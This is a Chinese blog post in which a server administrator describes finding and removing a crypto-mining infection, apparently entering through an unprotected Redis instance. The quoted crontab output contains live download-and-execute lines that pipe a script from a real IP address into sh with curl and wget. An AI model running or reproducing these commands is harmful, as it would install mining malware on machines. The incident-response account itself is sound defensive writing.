今天操作公司的第二臺服務器，服務器是金山云的云服務器。需要用到crontab定時任務，編寫了一個命令，重啟。之后再測試這條命令，然后很奇怪的是寫進去的crontab一會兒不存在了，很是納悶，難道我忘記保存了？？繼續操作，然后發新寫入的現定時任務又沒有了。這就讓我產生了懷疑，難道是金山云定制的一些功能，還是權限的問題？

執行crontab -l，列出當前任務

[root@vm10-0-0-3 shell]# crontab -l

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh

*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

還沒覺得奇怪，當我過了一會兒再刷新任務時，發現任務多了一個。

[root@vm10-0-0-3 shell]# crontab -l

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh

*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

一開始懷疑是云服務商的一些機制，帶著疑問我就百度了這個地址是做什么的。

百度搜索截圖

嚇到我了，居然是病毒地址。點開詳細查看了一下，確認是病毒。ip地址指向的美國，百度上介紹是挖礦病毒

搜狐新聞截圖

另外打開了url查看了一下，都是linux操作命令。

url內容截圖

由于工作時間較少，還是頭一回遇到次問題。趕緊解決吧

1、我先是編輯crontab -e，將上述url去掉。:wq保存。重啟crontab服務：service crond restart。果然crontab列表中沒再次出現自動增長的鏈接。

此時查看進行，發現2t3ik.p程序占用cpu率已經高達398.5%

意味著此時問題還沒解決。

2、按照網上搜索網友回答，我進入到/tmp文件夾下，

[root@vm10-0-0-3 tmp]# cd /tmp/

[root@vm10-0-0-3 tmp]# rm -rf 2t3ik.p

[root@vm10-0-0-3 tmp]# rm -rf ddgs.3011

此時，執行top命令，2t3ik.p程序cpu占用率依然沒有減少。

根據上圖所屬，pid為31484。執行"kill 31484"，殺死進程。執行top命令再看

PID為15505的進程cpu占用率依然占用著。再次執行"kill 15509"。

此時的運行狀態趨于正常狀態。查看了服務器近期的cpu占用率統計，原來這兩天cpu占用率一直高居不下。

本來以為這就好了，誰知過了五分鐘執行top命令，這個進程又死灰復燃了。！！！

cpu占用率依然高居不下

繼續kill掉pid為16160的進程。

繼續kill掉進行，有時還會以2t3ik.m出現。所以

接下來，進入/tmp文件夾，執行

cd /tmp/

rm -rf 2t3ik*? ? ? ? ? ? ? ? //刪除2t3ik文件

rm -rf ddgs*

touch 2t3ik.p? ? ? ? ? ? ? ? //自己創建空文件

touch 2t3ik.m? ? ? ? ? ? ? ?

touch ddgs.3011????

chattr +i 2t3ik*? ? ? ? ? ?//保護文件不被修改?

chattr +i ddgs*

相當于自己創建兩個文件，并且不給與修改的權限。這樣存留在系統中自動創建進行會于此沖突。

重啟服務器 shutdown -r now

問題就此解決。cpu占用率再沒急速上升。

究其原因，有個說法是低版本的redis數據庫沒有設置連接密碼，端口6379被掃描后入侵redis漏洞所致，獲取了用戶的權限。查看了服務器監控報表，確實發現是redis服務安裝之后的一天cpu開始異常增長的。建議大家如果遇到此問題，檢查redis，并對redis服務增設密碼，或者指定ip訪問。防止被掃描安裝病毒程序。

下面是一些相關資訊:

http://www.sohu.com/a/232674211_468694